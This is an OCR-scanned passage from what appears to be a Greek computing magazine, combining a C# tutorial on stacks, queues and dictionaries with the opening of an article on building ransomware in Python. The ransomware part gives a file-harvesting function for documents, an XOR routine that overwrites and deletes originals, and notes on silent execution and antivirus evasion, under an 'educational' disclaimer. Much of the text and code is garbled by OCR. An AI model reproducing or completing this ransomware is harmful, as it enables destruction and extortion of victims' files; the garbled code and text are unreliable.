Zy ἢ 

28 } 


Σημειώστε τη χρήση του namespace 'System.Collections.Generic', στο οποίο περι- 
λαμβάνονται όλες οι κλάσεις generic του .NET framework. Όπως βλέπετε στη үраџ- 
μή 7, το αντικείµενο dest. Ist ορίζεται σαν ένα List που θα φιλοξενεί string. Με αυτή 
τη μικρή αλλαγή, δεν απαιτείται κανενός είδους type casting στο πρόγραμμά µας. 
Φυσικά, σε αυτό το μικρό παράδειγµα που εξετάζουμε, το να κάνουμε µια µετατρο- 
πή δυο ñ τρεις φορές δεν αποτελεί πρόβλημα. Σε ένα µεγαλύτερο πρόγραµµα, µε 
περισσότερες λίστες και πιο εκτεταμένη χρήση των δεδοµένων τους, οι σχετικές 
μετατροπές θα προκαλούσαν πονοκέφαλο. Με τη χρήση της κλάσης generic List, 
αυτό το πρόβλημα απαλείφεται. 


Στοίβες 


Όσοι έχουν προηγούμενη προγραµμµματιστική εμπειρία εἰναι σχεδόν βέβαιο ότι έχουν 
ξανακούσει για τις στοίβες. Πρόκειται για µια δοµή που διαχειρίζεται τα δεδοµένα 
"σειραϊκά’, ακολουθώντας τη λογική LIFO (Last In First Out). Με άλλα λόγια, οι στοί- 
Вес μοιάζουν µε λίστες στις οποίες μπορούμενατροποποιήσουµε μόνο TO ένα άκρο. 
Έτσι, όταν αφαιρούμε δεδομένα, ακολουθούμε υποχρεωτικά την αντίστροφη σειρά 
από αυτήν µε την οποία έγινε η προσθήκη (από το πιο πρόσφατο στοιχείο προς το 
παλαιότερο). Φανταστείτε την ακριβώς σαν µια στοίβα µε πιάτα. Τοποθετούμε το 
ένα πιάτο πάνω στο άλλο και όταν θελήσουµε να πάρουμε κάποιο, αρχίζουμε матра- 
Варе πιάτα από τη κορυφή, έως ότου φτάσουμε στο επιθυμητό. Μπορεί va φαντά- 
ζει παράξενος αυτός ο τρόπος διαχείρισης, αλλά στον προγραμματισμό απαντάται 
πολύ συχνά και μπορεί va λύσει πολλά προβλήματα. Εξάλλου, οι στοίβες αποτελούν 
ένα бошко συστατικό της αρχιτεκτονικής των επεξεργαστών. Ας μείνουμε όµως 
ото .NET kat στη Οὔ, όπου οι στοίβες υλοποιούνται ue τη βοήθεια της κλάσης Stack. 


H Stack, όπως και η List, αποτελεί µια κλάση που ανήκει στην κατηγορία generic. 
Επομένως, κάθε φορά που δημιουργούμε ένα αντικείµενο Stack, πρέπει να δηλώ- 
σουµε τον τύπο των δεδοµένων που θα διαχειρίζεται. Па va τοποθετήσουµε ένα 
αντικείµενο στη στοίβα πρέπει να χρησιμοποιήσουμε τη μέθοδο Push(element), ενώ 
γιανα”τραβήξουμε" éva αντικείµενο από τη κορυφή προσφέρεται η μέθοδος Pop(). 
Αν δεν θέλουμε να αφαιρέσουμε то στοιχείο που βρίσκεται στην κορυφή της στοί- 
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Bac και επιθυμούμε µόνο va πάρουμε éva αντίγραφό του, πρέπει να κάνουμε χρήση 
της μεθόδου Peek(). Οι στοίβες αποτελούν µια ειδική µορφή λίστας και ως εκ τού- 
του διαθέτουν τη μέθοδο Clear(), την ιδιότητα Count κ.λπ. 

Ας δούμε éva икро πρόγραµµα που καταγράφει όσα οχήματα επιβιβάζονται σ ένα 
ferry boat --σαν κι αυτό που ελπίζουμε va βρισκόσαστε καθώς διαβάζετε το παρόν 
τεύχος. Το υποθετικό ferry boat δεν είναι αμφίπλωρο και τα οχήματα πρέπει να 
εξέλθουν µε την αντίστροφη σειρά απὀ αυτή µε την οποία εισήλθαν. Εντελώς συ- 
μπτωματικά, то μικρό καραβάκι συμπεριφέρεται σαν µια στοίβα αυτοκινήτων. 


01 using System; 

02 using System.Collections.Generic; 
03 

04 namespace StackExample( 

05 class Program( 


06 public static void Main(string[] args)í 

07 string plate; 

08 Stack«string» cars = new Stack«string»(); 

09 

10 while ((plate - Console.ReadLine()) !- "") ( 

11 cars.Push(plate); 

12 } 

13 

14 int boardedCars = cars.Count; 

15 СопѕоЈе.Мгіёеі іпе( "Уто πλοίο μπήκαν " + boardedCars.ToString() + " 
οχήματα"); 

16 Console.WriteLine("To όχηµα που μπήκε τελευταίο είναι το " + cars. 
Peek()); 

17 Console.WriteLine("Ta οχήματα θα πρέπει va εξέλθουν µε την εξής 
σειρά; "); 

18 for(int 1-0; i«boardedCars; 1++){ 

19 Console.Write((i*1).ToString() * " - " * cars.Pop()); 

20 Console.Writeline(" [κι απομένουν ακόµα " + cars.Count + " 

οχήματα εντός του πλοίου]"); 

2Ί } 

22 

23 Console.ReadKey(true); 

24 } 

25 ἢ 

26 } 
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Па κάθε όχηµα θα αποθηκεύουµε rov αντίστοιχο αριθµό κυκλοφορίας. Έτσι, στη 
γραμμή 8 δημιουργούμε τη στοίβα cars, που µπορεί να φιλοξενεί συμβολοσειρές. 
H εισαγωγή των δεδοµένων πραγματοποιείται στις γραμμές 10 έως 12. Παρατηρή- 
στε πώς έχουµε στήσει το συγκεκριµένο βρόχο. O έλεγχος της μεταβλητής plate, 
η οποία διατηρεί τον αριθµό κυκλοφορίας του εκάστοτε αυτοκινήτου, праүрато- 
ποιείται ταυτόχρονα µε τον έλεγχο επανάληψης του βρόχου. Έτσι, κάθε µη κενή 
συμβολοσειρά προστίθεται στη στοίβα κανονικά, ενώ μόλις ο χρήστης εισάγει ένα 
κενό string, ο βρόχος τερματίζεται και η στοίβα δεν τροποποιείται µε κανέναν τρό- 
πο. Ενδιαφέρον παρουσιάζει κι o δεύτερος βρόχος του προγράµµατος, που τυπώνει 
τα περιεχόμενα της στοίβας. Όπως Ва παρατηρήσατε, για rov έλεγχο του μετρητή 
(του βρόχου) δεν χρησιμοποιούμε την ιδιότητα Count. O μετρητής του βρόχου ou- 
γκρίνεται µε τη μεταβλητή boardedCars, στην οποία αποθηκεύσαµε την τιμή της 
ιδιότητας Count όταν ολοκληρώθηκε η εισαγωγή των αυτοκινήτων. Αναρωτιέστε 
γιατί κάναμε όλη αυτή τη φασαρία; Κάθε фора поо εκτελείται ο βρόχος, ro στοιχείο 
της στοίβας που βρίσκεται στην κορυφή αφαιρείται και κατά συνέπεια η ιδιότητα 
Count μεταβάλλεται. 


Άσκηση για την παραλία: Πόσες φορές 8a εκτελεστεί ο βρόχος για οκτώ εισαχθέ- 
ντα οχήματα, αν χρησιμοποιήσουμε την ιδιότητα Count για τον έλεγχο του μετρητή; 


Ουρές 


Ot ουρές (queues) αποτελούν ένα είδος λίστας, στο οποίο τα δεδοµένα κινούνται και 
πάλι σειραϊκά. H διαφορά τους από τις στοίβες έγκειται στον τρόπο µε τον οποίο 
*gEépyxovrat* τα δεδομένα. Φανταστείτε ότι σε αυτές τις λίστες μπορούμε va про- 
σθέτουµε στοιχεία στη μία άκρη και να αφαιρούμε από την άλλη. Αυτό έχει σαν απο- 
τέλεσμανα παίρνουμε πάντα το παλιότερο διαθέσιμο στοιχείο. Οι ουρές υλοποιούν 
τη λογική First In First Out, ἡ όπως συνηθίζουµε va λέμε στο Μαύρο Пало της Χίου, 
ΕΙΕΟ. 


Πα την υλοποίηση µιας ουράς μπορούμε va χρησιμοποιήσουμε την κλάση Queue, που 
ανήκει επίσης στην κατηγορία generic. Πα την εισαγωγή στοιχείων στην ουρά õa- 
τίθεται η μέθοδος Enqueue(element), ενώ για την αφαίρεση στοιχείων η Dequeue(). 
Πα να διαβάσουμε то στοιχείο που βρίσκεται στην έξοδο της λίστας χωρίς va ro δια- 
γράψουμε, προσφέρεται και πάλι η μέθοδος Peek(). Στο παράδειγµα που ακολουθεί 
κάνουμε χρήση της κλάσης Queue, ώστε να προσομοιάσουμε τον τρόπο εξυπηρέτη- 
σης των πελατών σε µια καντίνα. Και όχι σε каша τυχαία καντίνα, αλλά σ αυτή που 
βρίσκεται στο Μαύρο Παλό (της Χίου). 


01 using System; 

02 using System.Collections.Generic; 

03 

04 namespace QueueExample1 

05 class Program( 

06 public static void Main(string[] args)1 
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07 Queue<string> customers = new Queue«sstring»(); 

08 string name; 

09 

10 while ((name = Console.ReadLine()) !- "")í 

{1 customers.Enqueue(name); 

12 } 

13 

14 int customersSum - customers.Count; 

15 Console.WriteLine(customersSum.ToString() + " πελάτες περιμένουν να 
εξυπηρετηθούν"); 

16 Console.WriteLine("H σειρά εξυπηρέτησης εἰναι: "); 

17 for(int 1-0; i«customersSum; i++)í 

18 Console.Write((i*1).ToString() * " - " * customers.Dequeue()); 

19 Console.WriteLine(" [και απομένουν ακόµα " + customers.Count + " 


στη σειρά]"); 
20 } 
2 
22 Console.ReadKey(true); 
23 ) 
24 } 
25 p 


О κώδικας είναι ίδιος µε εκείνον που είδαµε oro προηγούμενο παράδειγµα. To µόνο 
που αλλάζει εἶναι τα ονόματα των μεταβλητών και, φυσικά, η συμπεριφορά της Ba- 
σικῆς δομής δεδομένων που τώρα είναι η ουρά. 


Λεξικά 
Πα το τέλος αφήσαμε µια ακόµα ενὸ 


ιαφέρουσα δομή δεδοµένων, που ονομάζεται 


λεξικό (dictionary). Τα λεξικά αποτελούν επίσης µια µορφή λίστας, για κάθε στοι- 
χείο της οποίας αποθηκεύεται ένα ζεύγος κλειδιού-τιμής. Όπως υποψιάζεστε, τα 


λεξικά επιτρέπουν την ανάκτηση οπο 
σειραϊκά. Па va πάρουμε uta rtr) арк 


ιασδήποτε τιμής και λειτουργούν кат' ανάγκη 
εἰ va χρησιμοποιήσουμε το αντίστοιχο κλειδί 


ως δείκτη, όπως ακριβώς κάνουμε και µε τα associative arrays στην PHP. Πα την 


υλοποίηση των λεξικὠν προσφέρεται 


κατηγορία generic. Κατά τη ónptoupy 


η κλάση Dictionary, που ανήκει και πάλι στην 
ία ενός λεξικού πρέπει να δηλώσουμε τύπο 


δεδομένων για τα κλειδιά, όπως επίσης και για τις τιµές. Πα παράδειγµα, δείτε τη 


δηµιουργία ενός λεξικού που θα αποθ 
σίμων: 
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πελάτες περιμένουν va εξυπηρετηθούν 

σειρά εξυπηρέτησης εἰναι: 
Χρήστος [και απομένουν ακόµα 5 στη σειρά] 
Παναγιώτης [και απομένουν ακόµα 4 στη σειρά] 
Κωνσταντίνα [και απομένουν ακόµα 3 στη σειρά] 
Στέλλα [και απομένουν ακόµα 2 στη σειρά] 
Γιώργος [και απομένουν ακόµα 1 στη σειρά] 
Ἰωάννα [και απομένουν ακόµα Ө στη σειρά] 


6 
H 
1 
2 
3 
4 
5 
6 


< > 


Ένας, ένας παρακαλούμε! Όλοι θα πάρετε To παγωτάκι σας.) 


Dictionary«sstring, float» fuel = new Dictrionarysstring,float?; 


To όνοµα του εκάστοτε καυσίμου θα λειτουργεί ως κλειδί (δείκτης) του λεξικού, 
ενω το αντίστοιχο κόστος θα αποτελεί µια τιµή του λεξικού. Έτσι, επιλέξαμε τον 
τύπο string για τα κλειδιά και τον τύπο float για τις τιμές. Η προσθήκη ζευγαριών 
(κλειδί-τιμή) σε éva λεξικό πραγματοποιείται µε τη μέθοδο Add(key,value). Συνεχί- 
ζοντας το προηγούμενο παράδειγµα, δείτε την προσθήκη του κόστους για την αμό- 
λυβδη 95ápa βενζίνη: 


fuel.Add("regular95", 1.678); 


Φωτιά και λάβρα! Πα την τιµή λέμε, διότι ο καιρός εἶναι ακόµα ήπιος για την εποχή. 
Па να πάρουμε µια τιµή από το λεξικό χρησιμοποιούμε τη σύνταξη που έχουµε δει 
στους πίνακες, µε τη μόνη διαφορά ότι o δείκτης δεν εἶναι πάντα αριθµητικός αλλά 
ἐχει τον τύπο που έχουµε επιλέξει για τα κλειδιά του λεξικού. Στη συγκεκριμένη 
περίπτωση, οι δείκτες εἶναι τύπου string. Δείτε тоос θα διαβάζαµε το κόστος για 
την αμόλυβδη 95ápa: 


float price = fuel["regular95"]; 
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Στην περίπτωση που δεν ξέρουμε av υπάρχει κάποιο συγκεκριµένο κλειδί στο λε- 
ξικό, μπορούμε va στραφούμε στη μέθοδο ContainsKey(key). Αυτή η μέθοδος πραγ- 
ματοποιεί µια γρήγορη αναζήτηση για το δοσμένο κλειδί και ανάλογα ре ro av 8q TO 
εντοπίσει επιστρέφει true ἡ false. Ομοίως, μπορούμε να κάνουµε αναζήτηση και για 
την ύπαρξη µιας συγκεκριμένης τιμής, αξιοποιώντας τη μέθοδο ContainsValue(val). 


Console.WriteLine(fuel.ContainsKey("regular95")); 
>> true 
Console.WriteLine(fuel.ContainsValue("1.10")); 

>> false 


Πα την αφαίρεση κάποιου στοιχείου апо ένα λεξικό προσφέρεται η μέθοδος 
Remove(key). Ας εξετάσουμε όµως ένα πιο ολοκληρωμένο παράδειγµα. To πρό- 
γραμμα που ακολουθεί χρησιμοποιεί ένα λεξικό για να αποθηκεύσει το πλήθος των 
μπάνιων που έκανε κάθε μέλος µιας μεγάλης παρέας. Σαν εφαρμογή θα την xapa- 
κτηρίζαμε παιδαριώδη, αλλά σαν πρόγραμμα έχει ιδιαίτερο ενδιαφέρον αφού επι- 
δεικνύει την ευελιξία που προσφέρουν τα λεξικά: 


01 using System; 

02 using System.Collections.Generic; 
03 

04 namespace DictionaryExample( 

05 class Programi 


0 dH044 - DictionaryExample - Τα μπάνια του λαού 
[1] Προσθήκη Μπάνιου 

[2] Αναζήτηση 

[3] Προβολή όλων 

[4] Έξοδος 


Δώστε την επιλογή σας: 


< 


Н κεντρική οθόνη επιλογών rou προγράµµατός µας. 
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06 public static void Main(string[] args)1 

07 Dictionary«string,int» mpania = new Dictionary«sstring,int»(); 

08 string selection - ""; 

09 Console.Title = "dH044 - DictionaryExample - Ta μπάνια του λαού"; 

10 dot 

q Console.Clear(); 

12 Console.Writeline("[1] Προσθήκη Μπάνιου"); 

13 Console.WriteLine("[2] Αναζήτηση”); 

14 Console.WriteLline("[3] Προβολή όλων”); 

15 Console.WriteLine("[4] Έξοδος"); 

16 Console.Write("NnAdote την επιλογή σας: "); 

177 selection = Console.ReadLine(); 

18 if(selection.StartsWith("1"))1 

19 Console.Clear(); 

20 Console.Write("Adote то ὀνομά σας για να προστεθεί ένα 
μπάνιο! :"); 

21 string name = Console.ReadLine(); 

22 if(mpania.ContainsKey(name))1 

23 mpania[name]-*; 

24 }е15е{ 

25 трапіа[пате] = 1; 

26 } 

27 Console.WriteLine("OK " + name + ". Ένα μπάνιο προστέθηκε oto 
λογαριασμό σου! "); 

28 Console.WriteLline("Vnllqrñotrg éva οποιοδήποτε πλήκτρο για 
συνέχεια... "); 

29 Console.ReadKey() ; 

30 jelse if (selection.StartsWith("2")) í 

31 Console.Clear(); 

32 Console.Write("Adote το буора προς αναζήτηση: "); 

33 string name = Console.ReadLine(); 

34 if(mpania.ContainsKey(name))1 

34 Console.WriteLine("0/H " + name + " έχει κάνει " + 

mpania[name].ToString() + " μπάνια μέχρι oruyuñç!"); 
35 }else{ 
36 Console.WriteLine("Aev βρέθηκε καταχώριση µε αυτό το 
όνομα! "); 
37 } 
38 Console.WriteLine("Wnilatrjote éva οποιοδήποτε πλήκτρο για 


33 


WV'HAGKKER 


συνέχεια..."); 


39 Console.ReadKey() ; 
40 jelse if(selection.StartsWith("3"))1 
41 Console.Clear(); 
42 if(mpania.Count > 0){ 
43 foreach(KeyValuePair<string, int> friend in mpania)í 
44 Console.WriteLine(friend.Key + " : " + friend.Value. 
ToString() * " μπάνια"); 
45 } 
46 }е15е{ 
47 Console.WriteLine("Aev υπάρχουν καταχωρίσεις προς 
εμφάνιση! "); 
48 } 
49 Console.WriteLine("Vnllqrñotrg éva οποιοδήποτε πλήκτρο για 
συνέχεια... "); 
50 Console.ReadKey(); 
51 } 
52 )while(!selection.StartsWith("4")); 
53 } 
54 } 
55 


Πιστεύουμε ότι о κώδικας δεν χρειάζεται ιδιαίτερη επεξήγηση. Το µόνο σηµείο που 
παρουσιάζει ξεχωριστό ενδιαφέρον εἶναι ο βρόχος που ξεκινάει στη γραμμή 43. 
Εκεί θα παρατηρήσετε ότι για κάθε στοιχείο του λεξικού παίρνουμε ένα structure 
KeyValuePair. Πρόκειται για uta δομή δεδομένων που ορίζουμε επιτόπου κι απαρτί- 
ζεται опо δύο στοιχεία (éva string και éva int). Στο στοιχείο KeyValuePair.Key αποθη- 
κεύεται το κλειδί TOU εκάστοτε ζεύγους, ενώ στο KeyValuePair Value αποθηκεύεται 
η τιµή που αντιστοιχεί στο εκάστοτε κλειδί. 


Οι δοµές δεδοµένων που εξετάσαµε είναι εξαιρετικά χρήσιμες και σε επόμενα 
τεύχη θα µας βοηθήσουν στην ανάπτυξη ρεαλιστικών εφαρμογών. Όπως πάντα, 
μπορείτε να κατεβάσετε ένα πακέτο µε τον κὠδικα των παραδειγμάτων από то 
http://bit.ly/dh044dnetp6. Μέχρι το επόμενο τεύχος σας ευχόμαστε να περνάτε 
καλά και να µην αφήνετε τίποτα να χαλάει την καλοκαιρινή σας διάθεση! 
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dH044 - DictionaryExample - Τα μπάνια του λαού 


Δώστε το буора σας yia να προστεθεί ένα μπάνιο! :Πέτρος 
ΟΚ Πέτρος. Eva μπάνιο προστέθηκε στο λογαριασμό σου! 


Πατήστε ένα οποιοδήποτε πλήκτρο για συνέχεια... 


5 


О Πέτρος έκανε ένα ακόµα μπάνιο και έσπευσε va ro καταχωρίσει! Ούτε μικρό παιδί να ήταν. 


dH044 - DictionaryExample - Τα μπάνια του λαού 


Δώστε το όνοµα προς αναζήτηση:Πέτρος 
Ο/Η Πέτρος έχει κάνει 1 µπάνια μέχρι στιγµής! 


Πατήστε ένα οποιοδήποτε πλήκτρο για συνέχεια... 


Έτσι εξηγείται η χαρά του Πέτρου! Το μπάνιο που καταχώρισε ήταν Το πρώτο της χρονιάς. 


dH044 - DictionaryExample - Τα μπάνια του λαού 


1 µπάνια 
2 µπάνια 


ένα οποιοδήποτε πλήκτρο για συνέχεια... 


Ιδού και ra αποτελέσµατα για όλη την παρέα. Ίσως τελικά να µην έχει 
μείνει και τόσο πίσω ο Πέτρος. Ένα μπάνιο είναι πολύ µικρή διαφορά! 
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Skill: Intermediate 
Tags: malware, ransomware, encryption, decryption, Python, Visual Basic Script 


Δημιουργία του δικού 
μας ransomware 


Γενικά, η δηµιουργία ενός malware δεν είναι εύκολη υπόθεση. Συχνά μάλιστα 
απαιτείται η συμμετοχή αρκετών προγραμματιστών, όπου καθένας αναλαμβάνει 
συγκεκριµένο κομμάτι. Πράγματι, ένα malware αποτελείται από διαφορετικά 
µέρη και κάθε προγραμματιστής αναλαμβάνει v' αναπτύξει εκείνο στο οποίο 
ειδικεύεται ή, µε άλλα λόγια, καλείται у αντιμετωπίσει το πρόβληµαπου 
γνωρίζει καλύτερα. 


από rov Andreas Venieris [aka Thiseas] 


Στο άρθρο αυτό θα φτιάξουμε ένα malware. Συγκεκριµένα, θα δημιουργήσουμε ένα 
ransomware, το οποίο θα μιμείται την συμπεριφορά γνωστού προγράµµατος που 
κρυπτογραφεί τα αρχεία του θύματος και μετά ζητά λύτρα για την αποκρυπτογρά- 
φηση. Πρόκειται για ένα σχετικά εύκολα υλοποιήσιμο πρόγραµµα, το οποίο όµως 
εἶναι δυνατόν να προκαλέσει ιδιαίτερα µεγάλη ζημιά στο θύμα. 


Τα διαφορετικά µέρη ενός ransomware 


Τα βασικά µέρη апо τα οποία πιθανώς απαρτίζεται ένα malware της κατηγορίας, 
είναι τα ακόλουθα: 


1. To µέρος της εγκατάστασης ото box rou θύματος. H εγκατάσταση εἰναι δυνα- 
τόν να πραγµατοποιηθεί µε πολλούς τρόπους. Μπορεί, π.χ. να υπάρχει éva link 
σε κάποιο phishing email, όπου ο αναγνώστης του παροτρύνεται να κατεβάσει 
éva άλλο, υποτίθεται, πρόγραμμα. Ίσως πάλι το malware να εἶναι κρυμμένο 
μέσα σε κάποιο άλλο, αθώο πρόγραμμα (περίπτωση Trojan horse). Ενδέχεται, 
εξάλλου, να επιχειρείται εκμετάλλευση κάποιας αδυναμίας ενός client-side 
προγράµµατος όπως, T.X, ένας PDF reader, évac web browser κ.ο.κ. Φυσικά, 
δεν πρέπει να αποκλείουµε και τη φυσική πρόσβαση του επιτιθέµενου στο 
рох του θύματος - μάλιστα, µια τέτοια επίθεση ἐχει μακράν την υψηλότερη 
πιθανότητα επιτυχίας. 


2. Το µέρος της ενεργοποίησης rou malware. Ένα malware δεν εἶναι απαραίτη- 
το να μολύνει τον υπολογιστή σας τη στιγμή που θα то "тоципдоєте". Πολλά 
malware διαθέτουν από απλούς έως ιδιαίτερα εξελιγµένους μηχανισμούς 
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ενεργοποίησης, (ὥστε η μόλυνση να ξεκινά σε συγκεκριμένη ηµεροµηνία και 
ώρα. Παράδειγμα τέτοιου malware αποτελεί o ιός "Friday 13th", που ενεργο- 
ποιούταν την αντίστοιχη μέρα. Μια τυπική μέθοδος για τον καθορισμό του 
χρόνου ενεργοποίησης είναι µε δηµιουργία cronjobs (συστήµατα Unix) ή ec 
σαγωγή εγγραφών στον Task Scheduler (συστήµατα Windows). Παρεμπιπτό- 
VTWG, αν υποψιάζεστε ότι το σύστημά σας εἶναι μολυσμένο, αξίζει να ρίξετε 
πρώτα µια ματιά στο crontab rou root ñ στον Task Scheduler rou Administrator. 


3. To µέρος της μόλυνσης. Εδώ υλοποιείται o αλγόριθμος o οποίος θα επιτε- 
λέσει τη ζημιά ото box rou θύματος. Πολύ συχνά, η έκταση της ζημιάς εἰναι 
ανάλογη των δικαιωμάτων που έχει ο χρήστης υπό το λογαριασμό του οποί- 
ου εκτελείται ro malware. Το ransomware που θα φτιάξουμε επιδρά µόνο σε 
αρχεία που δημιουργεί ο χρήστης υπό το λογαριασμό του οποίου ενεργοποι- 
ήθηκε. 


4. Το µέρος της ενημέρωσης του χρήστη για τη ζημιά που έχει πάθει. Εδω πα- 
ρέχονται και οδηγίες για την καταβολή των λύτρων, προκειµένου va "ξεκλει- 
δώσουν’ τα αρχεία του. 


5. Το µέρος της εξαφάνισης των ιχνών του προγράµµατος, αφού αυτό επιτελέ- 
σει το έργο του (μόνιμη διαγραφή σχετικών αρχείων, logs κ.ο.κ.) 


Το malware που κατασκευάζουμε εἶναι απλό αλλά καταστροφικό και θα θέλαμε να 
υπογραμµίσουµε εμφατικά ότι n όλη παρουσίαση έχει 100% εκπαιδευτικό χαρακτή- 
ρα. Το πώς θα το χρησιμοποιήσετε ή/και διαχειριστείτε είναι δική σας ευθύνη. 


To µέρος της εγκατάστασης (1) του δικού µας ransomware θα εἶναι απλό και θα χρει- 
άζεται τη φυσική σας παρουσία στο Ὀοχ-στόχος. Το µέρος της ενεργοποίησης (2) 
θα αφορά σε executable που τρέχει χωρίς να γίνεται αντιληπτό απὀ το χρήστη (θα 
σας πούμε πώς επιτυγχάνεται αυτό), το οποίο φυσικά είναι undetectable апо ra npo- 
γράμματα antivirus. Στο µέρος της μόλυνσης (3) θα εργαστούμε μαζί. Τα µέρη της 
ενημέρωσης (4) και της εξαφάνισης των хушу (5) δεν θα ra υλοποιήσουμε - τουλά- 
χιστον ὀχι στο πλαίσιο αυτού του άρθρου. 


Εργαλεία που χρησιµοποιήσαµε 


Το malware έχει αναπτυχθεί στη γλώσσα Python 2.7 και σε περιβάλλον Microsoft 
Visual Studio 2013 Community Edition, µε χρήση δωρεάν επέκτασης για ro Visual 
Studio που επιτρέπει την ανάπτυξη σε Python (http://bit.ly/pt4vs). 


Έγινε επίσης χρήση του εργαλείου Pylnstaller 2.1, για τη μετατροπή rou προγράµµα- 
τος σε εκτελέσιμο για Windows (https://pypi.python.org/pypi/PylInstaller/2.1). Kata- 
φύγαμε, τέλος, στην αγαπημένη µας σκριπτογλώσσα των Windows, στη Visual Basic 
Script (VBS), προκειµένου να κάνουμε "σιωπηλή" την εκτέλεση του ransomware kt 
ἔτσι το υποψήφιο θύμα να µην υποψιαστεί κάτι. 
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H λειτουργία 


To πρόγραµµα δέχεται δύο παραμέτρους: Το όνοµα ενός καταλόγου και TO password 
της κρυπτογράφησης. Το ransomware ξεκινά να κρυπτογραφεί όλα τα αρχεία που 
ἔχουν προέκταση txt, doc, docx, xls, xlsx, ppt ή pptx και βρίσκονται κάτω από τον 
κατάλογο που δόθηκε στην πρώτη παράμετρο - βεβαίως και κάτω από κάθε υπο- 
κατάλογό TOU. 


H μέθοδος κρυπτογράφησης που επιλέγουμε υλοποιείται µε τη βοήθεια του λογι- 
κού XOR. Το XOR ως πράξη επιδρά σε επίπεδο bit και δουλεύει σύμφωνα µε TOV 
ακόλουθο πίνακα: 


Όπως βλέπετε, όταν τα A kat B είναι ita τότε το A ΧΟΠ B είναι 0, ενω όταν τα A και B 
δεν είναι (бла τότε το A XOR B είναι 1. Έχοντας κατά vou rov προηγούμενο πίνακα, εἰ- 
ναι εύκολο να διαπιστώσουμε ότιαν U XOR P = Е, тоте E XOR P = U. Πατί ονομάσαμε 
τις μεταβλητές D, P και E; Πατί, πολύ απλά, έχουμε ката vou τις λέξεις Unencrypted, 
Password και Encrypted. Τι προσπαθούμε va πούμε; Ma, πως αν κρυπτογραφήσουμε 
κατά XOR κάτι που δεν εἶναι κρυπτογραφημένο (U) µε χρήση ενός συνθηματικού (P), 
τότε αν κρυπτογραφήσουµε για άλλη µια φορά το κρυπτογραφημένο αποτέλεσµα 
(E) *Eavá* κατά ХОВ και *палі* µε χρήση του ἰδιου συνθηµατικού (Р), παίρνουμε το 
αρχικό µη-κρυπτογραφηµένο "кат!" (U). Προφανώς, λοιπόν, αυτό που έχει σημασία 
εδώ εἶναι η γνώση του P. Δείτε κι ένα παράδειγµα όπου ξεκινάμε µε 


υ 100010111 
P 110110101 
U XOR P 010100010 


και συνεχίζουμε µε 
υ XOR P 010100010 
P 110110101 


(U XOR P) XOR P 100010111 
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(ro XOR γίνεται μεταξύ bits του ίδιου "επιπέδου"). Το πρόγραµµα που θα φτιάξου- 
με, την πρώτη φορά που θα εκτελείται θα κρυπτογραφεί και τη δεύτερη φορά που 
εκτελείται θα αποκρυπτογραφεί (αρκεί και τις δύο φορές να έχει χρησιμοποιηθεί 
το ἴδιο password). 


Ανάλυση κώδικα 


Όπως αναφέραμε, το πρόγραµµα εἰναι γραμμένο σε Python 2.7. Πρόκειται για µια 
γλὠσσα αρκετά διαδεδομένη η οποία μάλιστα χρησιµοποιείται "και για Tn δηµιουρ- 
vta malware. Οι λόγοι είναι αρκετοί κι ένας από τους κοινά αποδεκτούς είναι ότι µε 
τη συγκεκριμένη γλώσσα μπορούμε να κάνουμε αρκετά σύνθετα πράγματα µε πολύ 
λίγο κώδικα. 

Γενικά, όταν έχουμε να λύσουμε ένα πρόβλημα προγραμματιστικά, φροντίζουμε να 
TO χωρίζουμε σε επιµέρους υποπροβλήματα, δημιουργώντας ξεχωριστές functions 
για κάθε υποπρόβλημα. Ένα από αυτά τα επιµέρους προβλήµατα για ro malware µας, 
αφορά στον εντοπισμό όλων των αρχείων συγκεκριμένων καταλήξεων κάτω από 
έναν συγκεκριµένο κατάλογο. Δείτε µια υλοποίηση για την αντίστοιχη function: 


THHBHHHHHHHHHBHHHHHHHHHHBHHHHHHHHBBHHHHHHHHRBHHHHHHHBBBBHHE 
* Get all specific file types from a dir and its subdirs. 
# 
def getAllSubdirs(currentDir): 
allFiles - [] 
for root, dirs, files in os.walk(currentDir): 
allFiles += glob.glob(root*"W*.txt") 
allFiles += glob.glob(root*"W*.doc") 
allFiles += glob.glob(root*"NV*.docx") 
allFiles += glob.glob(root*"W*.xls") 
allFiles += glob.glob(root*" WV *.xlsx") 
allFiles += glob.glob(root*"W*.ppt") 
allFiles += glob.glob(root*" WV *.pptx") 
return allFiles 


H function getAllSubdirs δέχεται ως παράμετρο ro буора ενός καταλόγου. Επιστρέ- 
φει, στη λίστα allFiles, όλα τα αρχεία απλού κειµένου και του Office, τα οποία βρί- 
σκονται κάτω από αυτόν τον κατάλογο και τους υποκαταλόγους του. Προφανώς, 
είναι πολύ εύκολο va τροποποιήσουµε rov κὠδικα ώστε να επιστρέφονται αρχεία 
κι άλλων τύπων. 


Το επόμενο πρόβλημα που έχουµε αφορά στην κρυπτογράφηση ката ХОВ όλων των 
αρχείων που επέστρεψε η getAllSubdirs. Δείτε τις ακόλουθες δύο απλές συναρτή- 
σεις: 
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е еа 
# 
def encrypt(in file, out file, password): 
with open(in file, 'rb') as fileIN: 
with open(out file, 'wb') as fileOUT: 
for word in fileIN: 
for ch in word: 
encrypted = do encrypt(ch, password) 
fileOUT .write(encrypted) 
fileIN.close 
fileOUT.close 
os.remove(in file) 
os.rename(out file, in file) 
е а 
# 
def do encrypt (50, 51): 
# xor the strings! 
L= [ “ΠῚ (а ({5}) ὁ orel ({9} ) Πας Бю nm za (Xu. S Ἱ 
return ''.join (1) 


Н συνάρτηση encrypt θα κρυπτογραφήσει το αρχείο (1n παράμετρος) κατά XOR µε 
χρήση του κλειδιού (3n παράμετρος), δημιουργώντας έτσι éva νέο αρχείο (2η παρά- 
µετρος). Συνήθως, το αρχικό αρχείο διαγράφεται και διατηρείται µόνο το δεύτερο, 
δηλαδή n κρυπτογραφηµένη του εκδοχή. 


Όπως διαπιστώνετε, η πραγματική κρυπτογράφηση πραγματοποιείται από τη συ- 
νάρτηση do. encrypt, εφαρμόζοντας σε έναν προς ένας τους χαρακτήρες το XOR 
µε το κλειδί (password). Στην ουσία, η συνάρτηση encrypt είναι ένας wrapper της 
συνάρτησης do.enrypt, η οποία πραγματοποιεί την κρυπτογράφηση. Πα λόγους 
απλούστευσης της παρουσίασης, η συνάρτηση της κρυπτογράφησης έχει φτιαχτεί 
ἔτσι WOTE να δέχεται κλειδί μήκους 1, δηλαδή έναν χαρακτήρα. Αυτό όµως εύκολα 
μπορείτε va TO αλλάξετε. 


Το πώς kat µε ποια σειρά θα κληθούν οι παραπάνω συναρτήσεις, αφήνουμε ως συ- 
νήθως rov main κώδικα rou προγράμματός μας να το ορίσει: 


# Setup Var/s 

